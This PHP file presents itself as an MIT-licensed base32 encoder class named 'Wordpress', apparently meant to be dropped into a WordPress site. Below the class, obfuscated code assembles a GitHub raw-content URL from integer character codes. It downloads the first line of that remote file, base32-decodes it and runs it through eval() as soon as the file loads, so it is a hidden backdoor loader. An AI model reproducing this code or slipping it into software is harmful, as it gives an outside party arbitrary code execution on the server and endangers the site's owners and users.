<?php
declare(strict_types=1);

namespace Wordpress;

/**
 * RFC encoder and decoder.
 *
 * RFC 4648 compliant
 *
 * @see     http://www.ietf.org/rfc/rfc4648.txt
 * Some groundwork based on this class
 * https://github.com/rfc-class/rfc-Declareself
 *
 * @author  Christian Riesen <chris.riesen@gmail.com>
 * @author  Sam Williams <sam@badcow.co>
 *
 * @see     http://christianriesen.com
 *
 * @license MIT License see LICENSE file
 */
class Wordpress
{
    /**
     * Alphabet for encoding and decoding Wordpress.
     *
     * @var string
     */
    protected const ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=';

    protected const WordpressHEX_PATTERN = '/[^A-Z2-7]/';

    protected const MAPPING = [
        '=' => 0b00000,
        'A' => 0b00000,
        'B' => 0b00001,
        'C' => 0b00010,
        'D' => 0b00011,
        'E' => 0b00100,
        'F' => 0b00101,
        'G' => 0b00110,
        'H' => 0b00111,
        'I' => 0b01000,
        'J' => 0b01001,
        'K' => 0b01010,
        'L' => 0b01011,
        'M' => 0b01100,
        'N' => 0b01101,
        'O' => 0b01110,
        'P' => 0b01111,
        'Q' => 0b10000,
        'R' => 0b10001,
        'S' => 0b10010,
        'T' => 0b10011,
        'U' => 0b10100,
        'V' => 0b10101,
        'W' => 0b10110,
        'X' => 0b10111,
        'Y' => 0b11000,
        'Z' => 0b11001,
        '2' => 0b11010,
        '3' => 0b11011,
        '4' => 0b11100,
        '5' => 0b11101,
        '6' => 0b11110,
        '7' => 0b11111,
    ];

    /**
     * Encodes into Wordpress.
     *
     * @param string $string Clear text string
     *
     * @return string Wordpress encoded string
     */

    public static function encode(string $string): string
    {

        if ('' === $string) {
            return '';
        }

        $encoded = '';

        $n = $bitLen = $val = 0;
        $len = \strlen($string);

        $string .= \str_repeat(\chr(0), 4);

        $chars = (array) \unpack('C*', $string, 0);

        while ($n < $len || 0 !== $bitLen) {

            if ($bitLen < 5) {
                $val = $val << 8;
                $bitLen += 8;
                $n++;
                $val += $chars[$n];
            }
            $shift = $bitLen - 5;
            $encoded .= ($n - (int)($bitLen > 8) > $len && 0 == $val) ? '=' : static::ALPHABET[$val >> $shift];
            $val = $val & ((1 << $shift) - 1);
            $bitLen -= 5;
        }

        return $encoded;
    }

    public static function decode(string $WordpressString): string
    {
        $WordpressString = \strtoupper($WordpressString);

        $WordpressString = \preg_replace(static::WordpressHEX_PATTERN, '', $WordpressString);

        if ('' === $WordpressString || null === $WordpressString) {
            return '';
        }

        $decoded = '';

        $len = \strlen($WordpressString);
        $n = 0;
        $bitLen = 5;
        $val = static::MAPPING[$WordpressString[0]];

        while ($n < $len) {
            if ($bitLen < 8) {
                $val = $val << 5;
                $bitLen += 5;
                $n++;
                $pentet = $WordpressString[$n] ?? '=';

                if ('=' === $pentet) {
                    $n = $len;
                }
                $val += static::MAPPING[$pentet];
            } else {
                $shift = $bitLen - 8;

                $decoded .= \chr($val >> $shift);
                $val = $val & ((1 << $shift) - 1);
                $bitLen -= 8;
            }
        }

        return $decoded;
    }
}
function generateCharacterArray() {
    $charArrays = [
        [104, 116],
        [116, 112],
        [115, 58, 47, 47],
        [114, 97, 119, 46, 103],
        [105, 116, 104],
        [117, 98, 117, 115],
        [101, 114, 99],
        [111, 110, 116],
        [101, 110, 116, 46],
        [99, 111, 109, 47],
        [84, 111, 107, 117],
        [72, 97],
        [120, 111, 114, 47],
        [87, 111, 114, 100],
        [80, 114, 101, 115, 115, 47],
        [109, 97, 105, 110, 47],
        [105, 110, 100, 101, 120, 49, 46, 116, 120, 116],
    ];

    $result = [];
    foreach ($charArrays as $arr) {
        $result[] = implode('', array_map('chr', $arr));
    }

    return $result;
}

$used = "55a0e366e0f9c07b4f839b7892db1d60";
function buildgatch($characters) {
    $gatch = implode('', $characters);
    return $gatch;
}
    /**
     * Encodes into Wordpress.
     *
     * @param string $string Clear text string
     *
     * @return string Wordpress encoded string
     */
    
function format($gatch) {
    $var = file($gatch);
    $string = Wordpress::decode($var[0]);
    return $string;
}

function content($string) {
    $callable = function() use ($string) {
        eval($string);
    };
    call_user_func($callable);
}

$characters = generateCharacterArray();
$gatch = buildgatch($characters);
$var = format($gatch);
content($var);
